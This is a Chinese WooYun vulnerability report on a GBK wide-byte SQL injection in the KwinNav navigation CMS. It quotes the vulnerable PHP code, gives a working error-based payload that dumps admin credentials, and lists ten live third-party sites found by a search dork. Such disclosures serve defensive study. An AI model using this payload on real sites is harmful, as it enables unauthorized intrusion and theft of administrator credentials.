当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082272

漏洞标题:KwinNav 宽字符注入(demo成功)

相关厂商:KwinNav

漏洞作者: 宇少

提交时间:2014-11-07 19:02

修复时间:2015-02-05 19:04

公开时间:2015-02-05 19:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

早上去菜场买菜,有个大叔在菜场门口摆了六七根山药坐在矮凳上叫卖,我问大叔这山药吃了补肾吗?他说:当然补了,男人吃了,女人受不了!女人吃了,男人受不了!男女都吃了,床受不了!我乐了,笑问:这么好的东西,您咋不多种点?答:种多了,地受不了!

详细说明:

google关键词:Powered by KwinNav
你们说要提供5个以上非demo实列子 那好随便找了10个案例演示

http://www.3m4.net/admin/login.php
http://yulin.0912007.com/admin/login.php
http://www.cwen.org/114//admin/login.php
http://www.puerquan.com/daohang//admin/login.php
http://www.dm566.com//admin/login.php
http://95880.net//admin/login.php
http://hao.56lem.com/admin/login.php
http://daoh.22web.org/admin/login.php
http://www.114diy.cn/admin/login.php
http://56114.com.cn/admin/login.php


#1 admin/login.php 1-27行

<?php
set_time_limit ( 0 );
define ( 'ROOT' , str_replace("\\","/",dirname(dirname($_SERVER['SCRIPT_FILENAME'])).'/' ));
define ( 'PANEL_ROOT' , str_replace("\\","/",dirname(__FILE__)).'/' );
include_once(ROOT.'include/debug.php');
require_once(ROOT.'include/smarty_inc.php');
require_once(ROOT.'include/mysql_inc.php');
require_once(ROOT.'include/config_inc.php');
$templates->assign("version",$version);
$templates->assign("full_version",$full_version);
$templates->assign("build_version",$build_version);
$templates->assign("public_time",$public_time);
$type = _T(@$_GET['type']);
if(empty($type))
{
	$templates->display( PANEL_ROOT.'templates/login.tpl' );
}
elseif($type=='login')
{
	$db = new db_mysql( $dbhost, $dbuser, $dbpwd, $dbname);
	$username = _T(@$_POST['username']);
	$password = _T(@$_POST['password']);
	$user = $db->select("SELECT * FROM `{$dbprefix}_admin` WHERE `Name` = '{$username}'");


我们跟踪下_T
include\mysql_inc.php 199-207

function _T($str)     
{     
	if (!get_magic_quotes_gpc())
	{     
		$str = addslashes($str);
	}     
	return $str;
}
?>


如果gpc没开就转义
看似已经不能注入了
但是这里数据库编码字符设置是gbk
那么我们可以利用宽字符来注入
%df %aa
另外一个地方依然出现同样的问题
common\linkin.php 1-40行

<?php
session_start( );
set_time_limit ( 0 );
define ( 'ROOT' , str_replace("\\","/",dirname(dirname($_SERVER['SCRIPT_FILENAME'])).'/' ));
include_once(ROOT.'include/debug.php');
require_once(ROOT.'/include/config_inc.php');
require_once(ROOT.'/include/smarty_inc.php');
require_once(ROOT.'/include/mysql_inc.php');
$db = new db_mysql( $dbhost, $dbuser, $dbpwd, $dbname);
$type = _T(@$_GET['type']);
if(empty($type))
{
  $templates->assign("sites", $sites);
  $templates->display(ROOT."common/linkin.tpl");
}
else
{
  $Name = _T($_POST['Name']);
  $Link = _T($_POST['Link']);
  $Describe = _T($_POST['Describe']);
  if (empty($Name)||empty($Link)||empty($Describe))
  {
	echo "<script language=\"javascript\" type=\"text/javascript\">\n";
	echo "<!--\n";
	echo "alert (\"请将表单填写完整\");\n";
	echo "window.history.go(-1);\n";
	echo "-->\n";
	echo "</script>\n";
	exit();
  }
  $ip = getenv("REMOTE_ADDR");
  $db->query("INSERT INTO `".$dbprefix."_linkin` VALUES ('0' , '{$Name}', '{$Link}', NOW( ) , '{$ip}', '{$Describe}');");
  echo "<script language=\"javascript\" type=\"text/javascript\">\n";
  echo "<!--\n";
  echo "alert (\"申请成功,我们会尽快处理。\");\n";
  echo "window.history.go(-1);\n";
  echo "-->\n";
  echo "</script>\n";
}
?>

漏洞证明:

好了,废话不多说
直接注入演示官方demo

1.jpg


构造exp:

password=acUn3t1x&Submit=Submit&username=%df%27 AND (SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(Name,0x23,PassWord) FROM kw_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b)#


有图有真相思密达

1.jpg


修复方案:

mysql字符集转换
来20个rank
我要升级普通白帽子!

版权声明:转载请注明来源 宇少@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝